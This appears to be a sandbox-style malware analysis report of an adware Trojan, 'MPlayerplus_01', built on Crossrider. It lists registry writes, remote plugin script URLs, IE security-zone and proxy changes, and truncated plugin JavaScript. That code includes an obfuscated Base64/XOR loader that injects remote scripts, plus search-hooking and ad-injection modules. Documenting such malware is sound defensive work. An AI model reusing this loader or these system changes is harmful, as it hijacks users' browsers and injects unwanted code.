"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { //alert(appAPI.isMatchPages(*youtube*)); //alert(appAPI.isMatchPages(*watch*)); //alert(appAPI.isMatchPages(*hd=1*)) if (appAPI.isMatchPages(*youtube*) && appAPI.isMatchPages(*watch*) && !appAPI.isMatchPages(*hd=1*)) { //alert(window.location); window.location = window.location &hd=1"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"Version" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\MPlayerplus_01\Plugins\223]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Plugins\260]
"Name" = "pricedetect_sidebar_m"
[HKCU\Software\MPlayerplus_01\Plugins\269]
"Name" = "stats_ie"
[HKCU\Software\MPlayerplus_01\Debug]
"IsDebuggingPlugins" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/102.js"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/195.js"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"Version" = "13"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"Version" = "85"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/14.js"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/36.js"
[HKCU\Software\MPlayerplus_01\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\MPlayerplus_01\Plugins\230]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"Version" = "11"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Manifest]
"homepageurl" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/9.js"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/91.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/39.js"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Manifest]
"ModeType" = "production"
"PluginsManifestVersion" = "93"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\MPlayerplus_01\Plugins\275]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"Version" = "10"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"Name" = "IEBackground"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA D4 DD 75 CB 86 A0 31 8F A3 75 ED 89 8F 72 10"
[HKCU\Software\MPlayerplus_01\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/64.js"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"Name" = "ie8_fix_2"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\MPlayerplus_01\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\MPlayerplus_01\Plugins\273]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/273.js"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"Version" = "23"
[HKCU\Software\MPlayerplus_01\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/40.js"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/93.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"Name" = "hooks"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\MPlayerplus_01\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\MPlayerplus_01\Plugins\263]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/263.js"
[HKCU\Software\MPlayerplus_01\Plugins\180]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/180.js"
[HKCU\Software\MPlayerplus_01\Plugins\260]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/260.js"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/2.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"Version" = "102"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/184.js"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\286]
"Name" = "sp_j_m"
[HKCU\Software\MPlayerplus_01\Plugins\223]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/223.js"
[HKCU\Software\MPlayerplus_01\Plugins\192]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/41.js"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"Name" = "engageya_inner_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"SetNewTab" = "false"
"Manifest" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"Version" = "10"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"Name" = "revizer_p_dynamic_b2b_2_m"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/45.js"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"Name" = "set_campaign_id_m"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/44.js"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/244.js"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\MPlayerplus_01\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"ThanksUrl" = "NA"
"UninstallerOfferUrl" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Manifest]
"Description" = "MediaPlayerEnhance Extension"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Manifest]
"DisableIe" = "true"
[HKCU\Software\MPlayerplus_01\Plugins\275]
"Name" = "pricedetect_sidebar_small_m"
[HKCU\Software\MPlayerplus_01\Plugins\273]
"Name" = "aedgency_back_button_m"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/42.js"
[HKCU\Software\MPlayerplus_01\Plugins\263]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"Version" = "28"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/253.js"
[HKCU\Software\MPlayerplus_01\Plugins\45]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/43.js"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"Name" = "revizer_ws_dynamic_b2b_light_m"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\MPlayerplus_01\Plugins\269]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/269.js"
[HKCU\Software\MPlayerplus_01\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,269,93,102,104,180,184,192,220,195,211,221,223,226,230,233,242,244,253,260,262,263,273,275,281,286,289,91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\MPlayerplus_01\Plugins\286]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/286.js"
[HKCU\Software\MPlayerplus_01\Plugins\289]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/289.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherName" = "Freeven"
[HKCU\Software\MPlayerplus_01\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/47.js"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/17.js"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\MPlayerplus_01\Plugins\281]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/221.js"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/220.js"
[HKCU\Software\MPlayerplus_01\Code]
"NewTabJavaScript" = ""
[HKCU\Software\MPlayerplus_01\Plugins\46]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/46.js"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"
[HKCU\Software\MPlayerplus_01\Plugins\289]
"Name" = "covus_logos_m"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/242.js"
[HKCU\Software\MPlayerplus_01\Plugins\273]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/35.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\MPlayerplus_01\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\MPlayerplus_01\Plugins\262]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/262.js"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\MPlayerplus_01\Plugins\269]
"Version" = "1"
[HKCU\Software\MPlayerplus_01\Manifest]
"Name" = "MediaPlayerplus"
[HKCU\Software\MPlayerplus_01\Plugins\260]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Installer]
"osName" = "XP32"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\286]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\275]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/275.js"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/38.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherId" = "21636"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\MPlayerplus_01\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/104.js"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/211.js"
[HKCU\Software\MPlayerplus_01\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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)"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"Version" = "12"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all local web-nodes that have no dots in their names and are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\MPlayerplus_01\Plugins\41]
[HKCU\Software\MPlayerplus_01\Plugins\40]
[HKCU\Software\MPlayerplus_01\Plugins\2]
[HKCU\Software\MPlayerplus_01\Plugins\28]
[HKCU\Software\MPlayerplus_01\Plugins\45]
[HKCU\Software\MPlayerplus_01\Plugins\44]
[HKCU\Software\MPlayerplus_01\Plugins\47]
[HKCU\Software\MPlayerplus_01\Plugins\46]
[HKCU\Software\MPlayerplus_01\Plugins\42]
[HKCU\Software\MPlayerplus_01\Plugins\22]
[HKCU\Software\MPlayerplus_01\Plugins\21]
[HKCU\Software\MPlayerplus_01\Plugins\190]
[HKCU\Software\MPlayerplus_01\Plugins\191]
[HKCU\Software\MPlayerplus_01\Plugins\1]
[HKCU\Software\MPlayerplus_01\Plugins\220]
[HKCU\Software\MPlayerplus_01\Plugins\221]
[HKCU\Software\MPlayerplus_01\Plugins\226]
[HKCU\Software\MPlayerplus_01\Plugins]
[HKCU\Software\MPlayerplus_01\Plugins\7]
[HKCU\Software\MPlayerplus_01\Plugins\9]
[HKCU\Software\MPlayerplus_01\Plugins\207]
[HKCU\Software\MPlayerplus_01\Plugins\253]
[HKCU\Software\MPlayerplus_01\Plugins\104]
[HKCU\Software\MPlayerplus_01\Plugins\103]
[HKCU\Software\MPlayerplus_01\Plugins\102]
[HKCU\Software\MPlayerplus_01\Plugins\195]
[HKCU\Software\MPlayerplus_01\Plugins\38]
[HKCU\Software\MPlayerplus_01\Plugins\39]
[HKCU\Software\MPlayerplus_01\Plugins\72]
[HKCU\Software\MPlayerplus_01\Plugins\78]
[HKCU\Software\MPlayerplus_01\Plugins\184]
[HKCU\Software\MPlayerplus_01\Plugins\183]
[HKCU\Software\MPlayerplus_01\Plugins\182]
[HKCU\Software\MPlayerplus_01\Plugins\36]
[HKCU\Software\MPlayerplus_01\Plugins\35]
[HKCU\Software\MPlayerplus_01\Plugins\64]
[HKCU\Software\MPlayerplus_01\Plugins\233]
[HKCU\Software\MPlayerplus_01\Plugins\37]
[HKCU\Software\MPlayerplus_01\Plugins\211]
[HKCU\Software\MPlayerplus_01\Plugins\242]
[HKCU\Software\MPlayerplus_01\Plugins\244]
[HKCU\Software\MPlayerplus_01\Plugins\246]
[HKCU\Software\MPlayerplus_01\Plugins\177]
[HKCU\Software\MPlayerplus_01\Plugins\43]
[HKCU\Software\MPlayerplus_01\Plugins\91]
[HKCU\Software\MPlayerplus_01\Plugins\155]
[HKCU\Software\MPlayerplus_01\Plugins\94]
[HKCU\Software\MPlayerplus_01\Plugins\13]
[HKCU\Software\MPlayerplus_01\Plugins\3]
[HKCU\Software\MPlayerplus_01\Plugins\17]
[HKCU\Software\MPlayerplus_01\Plugins\14]
[HKCU\Software\MPlayerplus_01\Plugins\93]
[HKCU\Software\MPlayerplus_01\Plugins\4]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process MPlayerplus_01-codedownloader.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\MPlayerplus_01\Plugins\246]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/setup.js"
[HKCU\Software\MPlayerplus_01\Plugins\21]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Installer]
"subid" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\MPlayerplus_01\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el@'"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\MPlayerplus_01\Plugins\72]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiValidation.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderAppUtils.js"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderInfo.js"
[HKCU\Software\MPlayerplus_01\Installer]
"ErrorsDomain" = "http://errors.clientstaticserv.com"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi'"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:)
[HKCU\Software\MPlayerplus_01\Plugins\46]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDER'"
[HKCU\Software\Crossrider]
"Verifier" = "60aa827dc6ab7283db367fb7eb2cda1a"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\MPlayerplus_01\Plugins\155]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\MPlayerplus_01\Manifest]
"BgVersion" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO1'"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\MPlayerplus_01\Plugins\17]
